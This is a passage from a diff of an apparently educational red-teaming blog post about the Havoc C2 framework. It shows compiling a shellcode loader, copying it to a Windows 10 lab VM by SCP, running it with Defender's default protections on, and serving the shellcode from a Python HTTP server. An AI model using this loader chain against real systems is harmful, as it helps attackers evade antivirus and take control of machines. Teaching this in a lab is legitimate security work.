yl-labs/yl-labs.github.io/_posts/2025-03-18-red-reaming-havoc-c2.md

 ➜  SquidGuard
 ```

-Now, we can perform the compilation as follows :
+Now, we can perform the compilation as follows:

 ```
 ➜  SquidGuard x86_64-w64-mingw32-g++ --static webloader.cpp -o webloader.exe -lwinhttp -fpermissive
 ➜  SquidGuard
 ```

 With the actual executable in hand, we can now transfer it to the fully updated/patched Windows 10 machine we spoke of previously.
 Of course, this isn't applicable to a real engagement.
 However, the purpose of this demonstration is to provide you with an understanding of Havoc's core functionalities.
-A simulation of a real engagement utilizing all the techniques acquired in this course will be provided at the end of this course.
-More details later.
+Multiple simulations of real engagements utilizing all the techniques acquired in this course will be provided very soon!
+We'll make an announcement at some point, so stay tuned for that!

 #### Transfer of files

-The suggested way of transfering our loader to the Windows VM is via SCP.
-After making sure that SSH is installed (`sudo apt install ssh`) on Kali and up and running (`sudo service ssh status`), we can issue the following command in our Windows command prompt :
+The suggested way of transferring our loader to the Windows VM is via *SCP*.
+After making sure that SSH is installed (`sudo apt install ssh`) on Kali and up and running (`sudo service ssh start`), we can issue the following command in our Windows command prompt to initiate the transfer:

 ```
 scp kali@10.10.10.10:/path/to/exe .
 ```

-From there, the loader is executed while keeping all of Windows Defender's options ON :
+From there, the loader is executed while keeping all of Windows Defender's default protection options on:

 ![](/assets/imgs/havoc-c2/Pasted image 20240218211927.png)

-Looking back at our Python HTTP server, we will notice a request for our shellcode :
+Looking back at our Python HTTP server, we will notice a request for our shellcode:

 ```
 ➜  SquidGuard python3 -m http.server 8001